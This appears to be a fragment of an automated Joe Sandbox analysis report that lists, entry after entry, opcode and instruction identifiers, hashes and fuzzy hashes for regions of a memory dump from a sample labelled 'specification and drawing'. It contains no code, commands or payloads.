                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                          • Instruction ID: 416024d90a3fcd1934a703f77c5edd8f725e72e754e64c8c5224c24cf74db568
                                                                                                          • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                          • Instruction Fuzzy Hash: 9401F1726042167BEB299E29C806B9F7FA8DB80B50F04405DAB869B680D7B5D890C3E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3074932ca92eb0ffcb173f87ce1eb6875638bce2379d48644efe997b98d4048a
                                                                                                          • Instruction ID: dd8c73ab89ef412d01e719ea103d641eb2925c8cf07f9f3432f21661fdd41d32
                                                                                                          • Opcode Fuzzy Hash: 3074932ca92eb0ffcb173f87ce1eb6875638bce2379d48644efe997b98d4048a
                                                                                                          • Instruction Fuzzy Hash: 8E111B72900119ABCB16DB94CC80DDFB77CEF48258F044166A906A7211EA34AA55CBE0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                          • Instruction ID: 0e4e961638743a2f9f7e7b283cb74974d8f4eb2e29024066a96d75bcf01eba6d
                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                          • Instruction Fuzzy Hash: 3101F5322002118BDF159B6DD880B9AB7A6BFC4B00F2541AAED858F24BDA718881DB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba5e8b1679e6a57328916764d5acd4d021c0f0d6d526d319a97d7e2076380f5e
                                                                                                          • Instruction ID: d4ea5cac08267b82762fa0d16207a95522c618ac2b25ce6f0b5296bed0217020
                                                                                                          • Opcode Fuzzy Hash: ba5e8b1679e6a57328916764d5acd4d021c0f0d6d526d319a97d7e2076380f5e
                                                                                                          • Instruction Fuzzy Hash: CF11E132690146DFC349CF28D800BA6BBB9FB5A348F488159EC588B315D732EC81CBE0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4bf3bb54d5f81705f54b78088e9ed8d197e7510be98274dd772dea06c1e2125
                                                                                                          • Instruction ID: b42a4d3d3c8d506881383a78e96cf2dff52ab55f9c9ce3dcac2f118eb83f2469
                                                                                                          • Opcode Fuzzy Hash: a4bf3bb54d5f81705f54b78088e9ed8d197e7510be98274dd772dea06c1e2125
                                                                                                          • Instruction Fuzzy Hash: D611ECB1E012099FCB04DF99D581A9EB7F4FF58650F10406AA915E7351D774EA018BA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                          • Instruction ID: 45f2c95d50d4aa948ced80ef2aa1444cd466a7b1dbb23bb95ecb1d50fb92bb89
                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                          • Instruction Fuzzy Hash: CF012D321007059FEF669669D544FE7B7F9FFD5214F044429A6958B540DB70E402CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1f55f7149946fe03154be8ebc1965950dac539d1e7437cfeed3eb62893e563d3
                                                                                                          • Instruction ID: 9da290952866d91470579d44cb70e2c547ba50027f7e3f75afb897eb24193e73
                                                                                                          • Opcode Fuzzy Hash: 1f55f7149946fe03154be8ebc1965950dac539d1e7437cfeed3eb62893e563d3
                                                                                                          • Instruction Fuzzy Hash: EC116D75E0120DAFDB0AEF64D854FAE7BB5EF84644F004059EA019B290DB75AE11CB91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                                                                                          • Instruction ID: f88de7988ebb10f37b4a91857b9c9f43844a825836ef589c9001b067ebebaf54
                                                                                                          • Opcode Fuzzy Hash: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                                                                                          • Instruction Fuzzy Hash: 4001F7B1200B097FC315BB79CD80E97B7ACFF946547000629B50583561DB34EC11C6E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                                                                                          • Instruction ID: f26b12f79df7add2566eb89dfa34bf60e90ae324a4c7e73531b8519555239dd2
                                                                                                          • Opcode Fuzzy Hash: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                                                                                          • Instruction Fuzzy Hash: 3F01FC32224712DFC368DF7AD8889A7BBA8FF54664F514229ED79871C0E7309901C7D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                                                                                          • Instruction ID: 636392d547b8f6ff80cc51bae7b14b6a5c923766c22a0daff392edd576631ec6
                                                                                                          • Opcode Fuzzy Hash: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                                                                                          • Instruction Fuzzy Hash: 3F115B75A01209ABDB19EFA8C940EAE7BB5FB48644F004059B90197390DB34EA11CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                                                                                          • Instruction ID: 60adca924372c47458fa70b7733e8da0f667724c4e6856bddcf067b5aade0d9a
                                                                                                          • Opcode Fuzzy Hash: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                                                                                          • Instruction Fuzzy Hash: 3A1139B5A193099FC704DF69D441A9BBBE4FF98710F00851EBA98D7391E770E900CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                                                                                          • Instruction ID: 1eb2070de7d5a1daa99cbd3c1d83eb3478b036c9216efccb3e586678241bf642
                                                                                                          • Opcode Fuzzy Hash: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                                                                                          • Instruction Fuzzy Hash: E91179B1A193089FC304DF69D441A4BBBE4FF99750F00851AB998D73A0E770E900CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction ID: af70bf31075985ba792d2015b78a51501f9afb1f81fce82eebde949a037bf3c7
                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction Fuzzy Hash: 6B014C362006069FDF29DA6DD944F93B7E6FFC1200F044459E6538BA90DB74F842C754
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction ID: b0ce9d4f94b6bf8e4600e86581d6ae7f79a7103cbc722cffab8f83006dc939d4
                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction Fuzzy Hash: 8501DF322146849FE32A872DC908F2ABBD8EF44B44F0900B1FA45CF691D738DC80C621
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                                                                                          • Instruction ID: e147111640723ebe869d9bbd52e507eb95b3b26d821e52d7b9b8682c99d44281
                                                                                                          • Opcode Fuzzy Hash: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                                                                                          • Instruction Fuzzy Hash: 6401DF31A14505ABC71CEB6AD8809EEB7BDEF80620F05806ADA01A76A0DF30E902C690
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                                                                                          • Instruction ID: e501fca1e572d9522aa96c0a18f507211fd577ba1fa3743397d056be5ae5cfe6
                                                                                                          • Opcode Fuzzy Hash: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                                                                                          • Instruction Fuzzy Hash: 12F0F432B41B25B7C7359B5A8D40F5BBAA9EB94FA0F00402CA64597600CA30ED01CBB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction ID: d5a2e68cdcc854230b445e33b760e7fb78a1ffbea9f44c2a8259354b6da02f75
                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction Fuzzy Hash: 2DF0C2B2A00615AFE328CF4EDD40E57FBEEDBD5A80F048168E549C7220EA31DD04CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction ID: be3259422875d80e9ad87eee374ad4ee48733744aac1ec37fb9e10b01afcd26f
                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction Fuzzy Hash: 0CF08B33206A339BF732165D49C0BEFAAD58FE1F64F1A4036F2899B304CA648D0293D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                          • Instruction ID: 58f4666e7bb0a2d0d72d158696c72ce8e59cde76faf7d63e4f7ef9f3e32e4476
                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                          • Instruction Fuzzy Hash: F1012832600689DBE336971DC906F9ABFD8EF81758F0941A9FB848FEA1D778D800C655
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                                                                                          • Instruction ID: fb1292d838e491e6efd2a1de5a4deb0c308a432e3cd64ea6667870edade1d7ae
                                                                                                          • Opcode Fuzzy Hash: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                                                                                          • Instruction Fuzzy Hash: F6018F71E012499FCF08DFA9D441EEEBBF8BF58714F14405AE500AB280D774EA01CBA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction ID: 33044441ad4d4b0b2c00794eb3f19ad6af76c79b35e331849e0266df2514a164
                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction Fuzzy Hash: 59F01D7220011DBFEF019F95DD80DEF7BBEEB596A8B104125FA1196160D731DD21EBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                                                                                          • Instruction ID: f92b9561aa21be911a23688ba8c3c3c58dc4b44419a2a65608f0adb90ca8d7b2
                                                                                                          • Opcode Fuzzy Hash: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                                                                                          • Instruction Fuzzy Hash: 5F018936100109ABCF169F84E940EDE3F66FF4C664F068111FE196A220C332D971EF81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                                                                                          • Instruction ID: 749eab630fbee3b47bac0e70b42798d1682b3dca59270fa90401930cd9829cda
                                                                                                          • Opcode Fuzzy Hash: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                                                                                          • Instruction Fuzzy Hash: 2CF08B322002415BF7949208CD51BA232D5E7D1650F288469E7849F2C0E9B0CC018794
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                                                                                          • Instruction ID: 920b35945aca78a97dce75edcc261b7d29d0877f1190a98582c49fd440419d52
                                                                                                          • Opcode Fuzzy Hash: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                                                                                          • Instruction Fuzzy Hash: EB01A470204B819BE36BA73CDD4DF6937E4BB40F04F480694BB41DBED6D769D4418615
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                          • Instruction ID: 7e16f2fbc15599124a24385ea26509b9deada3c7c1abeb36d9a99cde8790acfa
                                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                          • Instruction Fuzzy Hash: 9CF02E35349E3347EB3DAA2F8810B2FBA9E9F90E00B05052C9A41CBE80DF21DC10C780
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                          • Instruction ID: fec19b6754fbad92517ac60733ce38e236eea0b787031e98cd260bc77a154162
                                                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                          • Instruction Fuzzy Hash: 9AF05E727526139BFB299B4EDC80F16B7A8BFD5E60F1A0065A6049F260C764EC0187D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                                                                                          • Instruction ID: df39dfd5a02c2119fd30e321fc3773b366900fb2affd6b1fd7103b1b3d8bc3ad
                                                                                                          • Opcode Fuzzy Hash: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                                                                                          • Instruction Fuzzy Hash: D6F0AF70A1A3059FD318EF28C541A1BB7E4FF98714F40465AB898DB394E734EA00CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                          • Instruction ID: 67083210e652bc064779d67e72a0ec2bd96048f624c0c0ef7c33cb3fda3c8848
                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                          • Instruction Fuzzy Hash: D4F02472600200AFE314DB21CC01F86B6EAEF98300F148078AAC4C7164FBB4DD01C654
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                                                                                          • Instruction ID: ea8f231fe76bba5a8b1eb26a0582145f180aa10023100d8b783c9d307f7ebb99
                                                                                                          • Opcode Fuzzy Hash: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                                                                                          • Instruction Fuzzy Hash: E1F0BB325012449BD62E6B5CD8C4B9EBF6EFB94B10F094469FA992711187306C81C790
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                                                                                          • Instruction ID: c61278eab3a6c4451ec4a0239bf52c4c9e4c486fb7e3459312d7b545dbf3270e
                                                                                                          • Opcode Fuzzy Hash: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                                                                                          • Instruction Fuzzy Hash: B7F0AF74A02209AFCB08EF69C551B9EB7B4FF18300F008065A955EB385EA74EA01CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                                                                                          • Instruction ID: 07962cd6854ac5ec4a710f63408ee5a7527125848bce4dd684b181d60bf46a28
                                                                                                          • Opcode Fuzzy Hash: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                                                                                          • Instruction Fuzzy Hash: B1F0F0319122E58EE7728F1CC034B2F7BC4BB00E20F0888AED5C9C3522C724D888CE10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                                                                                          • Instruction ID: 6f19b045fa4d2a13de06970a7f44788dd649ff1759716bde5b6efaa264d835e2
                                                                                                          • Opcode Fuzzy Hash: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                                                                                          • Instruction Fuzzy Hash: D4F027264156890ADF3E7B2C78D02D13B65A769124F095055E4B067209C774C8C7CB20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                                                                                          • Instruction ID: 6587e49b594246c33a893a5dabf3bc9220b086792e09bb634c4b05dcd88bc9f6
                                                                                                          • Opcode Fuzzy Hash: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                                                                                          • Instruction Fuzzy Hash: A4F02E715192999BF7A2861CC30BF517BD49B0CAA0F0894AAC6C283E02C220E880CA40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
